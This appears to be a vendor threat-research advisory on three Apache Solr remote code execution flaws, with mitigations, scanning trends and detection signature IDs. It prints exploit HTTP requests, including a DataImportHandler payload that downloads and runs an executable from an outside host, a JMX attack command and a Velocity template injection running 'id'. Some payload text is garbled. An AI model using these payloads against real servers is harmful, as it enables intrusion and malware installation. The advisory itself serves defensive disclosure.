Apache Solr is a fast open-source Java search server. Solr enables you to easily create search engines which searches websites, databases and files. It's been an industry player for almost a decade, offers real-time indexing, dynamic clustering, load-balanced querying, replication, automated fail-over and recovery. Quite a few internet giants such as Netflix, eBay, Instagram, and Amazon use Solr because of its ability to index and search multiple sites.

Remote Code Execution Vulnerabilities:

CVE-2019-0193:

This vulnerability is due to the ability to remotely configure DataImportHandler via the "/solr//dataimport" URI. When such a request is received, the handleRequestBody() method of DataImportHandler is called, which results in a call to runCmd() with the request parameters as an argument. If the command HTTP parameter is set to full-import, doFullImport() is called which results in a call to DocBuilder.execute() causing the XML data to be evaluated. This XML data may contain components which may result in arbitrary code execution.

Exploit:

Target running a vulnerable version of the Solr software with the DataImportHandler plugin enabled, can be exploited with the below request.

POST /solr/test/dataimport HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded; Charset=UTF-8
Accept: */*
Accept-Language: zh-cn
Referrer: http://XXXX:8983/solr/test/dataimport
User-Agent: Mozilla/4.0
Content-length:
Host: XXXX:8983

command=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&name=dataimport&dataConfig=
<dataConfig>
<dataSource type="URLDataSource"/>
<script><![CDATA[
function poc(row){
var process = jav.lang.Runtime.getRuntime();
process.exec("cm d.exe /c certutil.exe -urlcache -split -f http://fk.0xbdairolkoie.space/download.exe %SymtemRoot%/Temp/qlvgcgsdomyjhfd26554.exe & cm d.exe /c %SymtemRoot%/Temp/qlvgcgsdomyjhfd26554.exe");
return row;
}
]]</script>
</dataConfig>

Mitigation:

Solr versions prior to 8.2.0 are affected by this. Updating to the latest version will resolve the issue.

CVE-2019-12409:

This vulnerbaility is due to insecure setting for the ENABLE_REMOTE_JMX_OPTS configuration option in the default solr.in.sh configuration file. If you use the default solr.in.sh file from the affected releases, then JMX monitoring will be enabled and exposed on RMI_PORT (default=18983), without any authentication. If this port is opened for inbound traffic in your firewall, then anyone with network access to your Solr nodes will be able to access JMX, which may in turn allow them to upload malicious code for execution on the Solr server.

Exploit:

If ENABLE_REMOTE_JMX_OPTS is set to "true", attackers can execute malicious code on the server using the below code.

java -jar jython-standalone-2.7.0.jar mjet.py host 18983 install super_secret

Mitigation:
Solr versions 8.1.1 and 8.2.0 for Linux are affected by this.

This issue can be fixed by changing the ENABLE_REMOTE_JMX_OPTS set to 'false' on every Solr node and then restart Solr server or by updating Solr to the latest version.
Also recommend blocking inbound traffic on JMX_PORT.

Zero day (CVE not yet assigned):

Apache Solr has a remote command execution vulnerability based on Velocity templates. This vulnerability is due to the injection of Velocity templates. An attacker could use the vulnerability to access the Core name on the Solr server, first set params.resource.loader.enabled to true, then load a resource and execute the command on the server.

Exploit:

Apache-Solr integrates the VelocityResponseWriter plug-in by default. The params.resource.loader.enabled parameter in the plug-in initialization is used to control whether the parameter resource loader is allowed to specify a template in the Solr request parameter. The default setting is false. The attacker can set the parameter params.resource.loader.enabled to true through a POST request. Later sending a crafted GET request code can cause a remote code execution on the Solr server.

The params.resource.loader.enabled option of the VelocityResponseWriter initialization parameter in the Velocity template is turned on with the following POST request.

POST / solr / test / config HTTP / 1.1
Host: solr: 8983
Content-Type: application / json
Content-Length: 259

{
  "update-queryresponsewriter": {
    "startup": "lazy",
    "name": "velocity",
    "class": "solr.VelocityResponseWriter",
    "template.base.dir": "",
    "solr.resource.loader.enabled": "true",
    "params.resource.loader.enabled": "true"
  }
}

Later, attackers load a malicious templates into the Solr template with the following GET request.

GET /solr/test/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java. lang.Runtime% 27)) +% 23set ($ chr = $ x.class.forName (% 27java.lang.Character% 27)) +% 23set ($ str = $ x.class.forName (% 27java.lang. String% 27)) +% 23set ($ ex = $ rt.getRuntime (). Exec (% 27id% 27)) + $ ex.waitFor () +% 23set ($ out = $ ex.getInputStream ()) +% 23foreach ($ i + in + [1 .. $ out.available ()]) $ str.valueOf ($ chr.toChars ($ out.read ()))% 23end HTTP / 1.1
Host: XXX:8983

Mitigation:

No fix from the vendor available yet.

Review the VelocityResponseWriter class in the solrconfig.xml configuration file, ensure the params.resource.loader.enabled value is set to false.
Also make sure Config API is locked down, else attacker could modify the solrconfig.xml.

Trend Chart:

At the time of writing this article, we are not aware of attacks exploiting these vulnerabilities in the wild, but we see an increasing scanning activity for port 8983 & 18983 in the recent past. More Widespread attacks on the vulnerable Solr servers could be imminent.

Fig: Port activity taken from SANS Internet Storm Center: Port 8983

Fig: Port activity taken from SANS Internet Storm Center: Port 18983

Top IP's scanning the port 8983:

185.153.197.5
185.153.197.5
51.38.162.236
159.203.201.236
159.203.201.19
51.38.162.236
159.203.201.84
159.203.201.64
211.159.219.162
125.64.94.221
194.61.24.102

SonicWALL Capture Labs Threat Research team provides protection against this threat with the following signature:

IPS: 14096 Apache Solr Config API Insecure Deserialization
IPS: 14445 Apache Solr DataImportHandler Remote Code Execution 1
IPS: 14446 Apache Solr DataImportHandler Remote Code Execution 2
IPS: 14599 Apache Solr DataImportHandler Remote Code Execution 3
IPS 14600 Apache Solr Config VelocityResponseWriter
IPS: 13036 Apache Solr Remote Code Execution 1
IPS: 13037 Apache Solr Remote Code Execution 2
IPS: 13287 Apache Solr DataImportHandler Information Disclosure
WAF: 1738 Apache Solr DataImportHandler Remote Code Execution
WAF: 1702 Apache Solr Config API Insecure Deserialization

November 27, 2019/by